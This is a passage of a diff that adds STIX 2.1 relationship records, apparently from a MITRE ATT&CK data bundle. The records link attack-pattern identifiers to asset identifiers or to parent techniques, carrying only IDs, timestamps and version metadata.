"x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8fd7298d-76bf-46fa-9863-f359659a9506", + "created": "2024-06-21T14:12:20.259Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.259Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7c0f17c9-1af6-4628-9cbd-9e45482dd605", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8fda39f3-045e-40aa-afaf-da00eb969910", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2f41939b-54c3-41d6-8f8b-35f1ec18ed97", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8fe2bc4c-e9f7-430d-84d5-e3d603141dcb", + "created": "2023-09-29T17:04:17.682Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:04:17.682Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--9a505987-ab05-4f46-a9a6-6441442eec3b", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9000b2ad-b242-44af-a9cb-2529f4c55122", + "created": "2024-07-02T13:55:55.771Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.771Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9006572e-6922-4968-afd8-147fa75ca3cb", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ebbe170d-aa74-4946-8511-9921243415a3", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--901430a7-dfd0-408b-83d5-e528b6452a8f", + "created": "2024-06-21T14:12:20.264Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.264Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0533ab23-3f7d-463f-9bd8-634d27e4dee1", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--901fbb5b-7ed1-4c3b-b335-b145bf43d1f0", + "created": "2024-06-27T09:04:07.108Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:04:07.108Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--851e071f-208d-4c79-adc6-5974c85c78f3", + "target_ref": "x-mitre-asset--7818eb69-414c-43d2-9816-77e90a710edc", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--90665caf-bfe0-45fd-b7fe-0a3e13034e26", + "created": "2024-06-21T14:12:20.276Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.276Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e3b6daca-e963-4a69-aee6-ed4fd653ad58", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--908e3fa1-e2b9-475e-b72d-06343a65a3c6", + "created": "2023-09-28T20:04:44.041Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:04:44.041Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3f1f4ccb-9be2-4ff8-8f69-dd972221169b", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9097e0d0-af73-49ee-8aa7-110b56a405f9", + "created": "2024-06-26T13:39:36.333Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T13:39:36.333Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--799ace7f-e227-4411-baa0-8868704f2a69", + "target_ref": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--90caf9d5-5ba5-44fd-9d2b-33342ed8cfed", + "created": "2024-06-21T14:12:20.259Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.259Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--70d81154-b187-45f9-8ec5-295d01255979", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--90cf0944-c785-48e8-8bfe-2d329fa19bf6", + "created": "2024-07-02T13:55:55.754Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.754Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--6495ae23-3ab4-43c5-a94f-5638a2c31fd2", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--90d76273-d2e2-42dd-8ac5-1e34fe4553e2", + "created": "2024-06-21T14:12:20.258Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.258Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--90d9ab52-79e0-4856-b68c-03363d3ab413", + "created": "2024-07-02T13:55:55.766Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.766Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--90e76668-5951-408b-953e-52e80a2d0fee", + "created": "2024-07-02T13:55:55.754Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.754Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--90f5980f-275f-4089-8614-4040c0eacbd0", + "created": "2024-07-02T13:55:55.757Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.757Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d467bc38-284b-4a00-96ac-125f447799fc", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--90fdd7f4-82f5-463e-ba07-35b033d9cf42", + "created": "2024-07-02T13:55:55.770Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.770Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--774a3188-6ba9-4dc4-879d-d54ee48a5ce9", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--910bada1-c923-4009-a9ea-da257072f168", + "created": "2023-09-29T16:29:27.902Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T16:29:27.902Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--cfe68e93-ce94-4c0f-a57d-3aa72cedd618", + "target_ref": "x-mitre-asset--973bc51e-c41e-4cec-ac03-9389c71f3d0d", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--910da4ab-6c55-4fd7-85bc-dc5cb46f0aa5", + "created": "2024-07-02T13:55:55.764Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.764Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4ab929c6-ee2d-4fb5-aab4-b14be2ed7179", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9111a58f-83f2-4c69-ace5-45ff4b53b5e5", + "created": "2024-07-02T13:55:55.753Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.753Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--494ab9f0-36e0-4b06-b10d-57285b040a06", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--911d412e-9dd7-49ae-ab6a-a078b44a1791", + "created": "2020-01-15T16:27:32.733Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--18d4ab39-12ed-4a16-9fdb-ae311bba4a0f", + "target_ref": "attack-pattern--dca670cf-eeec-438f-8185-fd959d9ef211", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9131af72-6fa7-4292-b959-05f774e77f7e", + "created": "2020-02-20T15:37:27.398Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--2bee5ffb-7a7a-4119-b1f2-158151b19ac0", + "target_ref": "attack-pattern--c675646d-e204-4aa8-978d-e3d6d65885c4", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9152708d-5c99-4c84-a493-c24f2952756f", + "created": "2024-06-26T13:47:54.936Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T13:47:54.936Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--72b74d71-8169-42aa-92e0-e7b04b9f5a08", + "target_ref": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--91577382-f5b3-417f-a3ca-fa889d24069d", + "created": "2024-06-27T08:52:12.703Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T08:52:12.703Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--435dfb86-2697-4867-85b5-2fef496c0517", + "target_ref": "x-mitre-asset--7818eb69-414c-43d2-9816-77e90a710edc", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--91715c9c-fa47-4a24-9b5c-134cffc3aedc", + "created": "2024-06-21T14:12:20.267Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.267Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9175721d-ca74-4648-94e6-11e117a2cd12", + "created": "2020-10-01T00:58:35.342Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--810d8072-afb6-4a56-9ee7-86379ac4a6f3", + "target_ref": "attack-pattern--7e3beebd-8bfe-4e7b-a892-e44ab06a75f9", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--91814b6d-fd56-4f63-9c2f-d05720dd1b82", + "created": "2024-06-21T14:12:20.255Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.255Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--918c0842-eff8-42fa-bc53-2924f1d78bec", + "created": "2024-07-02T13:55:55.759Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.759Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--918dac8b-8c29-4c81-b4d1-d558ab01558d", + "created": "2024-07-02T13:55:55.756Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.756Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--91b19901-8bf4-44b3-8db3-e178f37283db", + "created": "2024-07-02T13:55:55.765Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.765Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--6495ae23-3ab4-43c5-a94f-5638a2c31fd2", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--91c14db8-d5db-4597-9b80-f0abfbf416b9", + "created": "2024-07-02T13:55:55.759Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.759Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--91cd3160-de21-4eb1-8602-f7e14aac697a", + "created": "2024-07-02T13:55:55.771Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.771Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--bf1b6176-597c-4600-bfcd-ac989670f96b", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--91d3ecc6-aa3f-4a8a-a296-88fc40102a8d", + "created": "2024-07-02T13:55:55.762Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.762Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f3c544dc-673c-4ef3-accb-53229f1ae077", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--91e895b5-66a1-48ef-b53a-1d52a2f86f02", + "created": "2024-07-02T13:55:55.770Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.770Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a542bac9-7bc1-4da7-9a09-96f69e23cc21", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--91fe5a66-c8d2-4d6e-932c-63de19b2cafa", + "created": "2024-07-02T13:55:55.760Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.760Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--6b57dc31-b814-4a03-8706-28bc20d739c4", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--92046900-3dc2-46d3-b896-a031b088f80e", + "created": "2024-06-21T14:12:20.272Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.272Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8c32eb4d-805f-4fc5-bf60-c4d476c131b5", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9238d096-ed26-4a93-829e-d67ee3abc93c", + "created": "2020-03-15T15:30:42.481Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--79a4052e-1a89-4b09-aea6-51f1d11fe19c", + "target_ref": "attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--923a726f-6360-4608-9ac3-46cac213363e", + "created": "2024-06-21T14:12:20.270Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.270Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4d2a5b3e-340d-4600-9123-309dd63c9bf8", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9249998f-a2e7-4a3d-b1bb-58aff52844c8", + "created": "2024-06-27T09:07:21.661Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:07:21.661Z", + "description": "", + "relationship_type": "targets", + "source_ref": 